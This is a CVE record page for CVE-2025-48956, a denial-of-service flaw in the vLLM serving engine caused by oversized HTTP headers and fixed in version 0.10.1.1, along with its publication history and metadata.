vLLM is an inference and serving engine for large language models (LLMs). From 0.1.0 to before 0.10.1.1, a Denial of Service (DoS) vulnerability can be triggered by sending a single HTTP GET request with an extremely large header to an HTTP endpoint. This results in server memory exhaustion, potentially leading to a crash or unresponsiveness. The attack does not require authentication, making it exploitable by any remote user. This vulnerability is fixed in 0.10.1.1.
Metrics
Affected Vendors & Products
References
History
Thu, 21 Aug 2025 15:15:00 +0000
Type | Values Removed | Values Added |
---|---|---|
Metrics |
ssvc
|
Thu, 21 Aug 2025 15:00:00 +0000
Type | Values Removed | Values Added |
---|---|---|
Description | vLLM is an inference and serving engine for large language models (LLMs). From 0.1.0 to before 0.10.1.1, a Denial of Service (DoS) vulnerability can be triggered by sending a single HTTP GET request with an extremely large header to an HTTP endpoint. This results in server memory exhaustion, potentially leading to a crash or unresponsiveness. The attack does not require authentication, making it exploitable by any remote user. This vulnerability is fixed in 0.10.1.1. | |
Title | vLLM API endpoints vulnerable to Denial of Service Attacks | |
Weaknesses | CWE-400 | |
References |
| |
Metrics |
cvssV3_1
|

Status: PUBLISHED
Assigner: GitHub_M
Published: 2025-08-21T14:41:03.889Z
Updated: 2025-08-21T15:02:09.023Z
Reserved: 2025-05-28T18:49:07.585Z
Link: CVE-2025-48956

Updated: 2025-08-21T15:01:54.882Z

Status : Received
Published: 2025-08-21T15:15:32.230
Modified: 2025-08-21T15:15:32.230
Link: CVE-2025-48956

No data.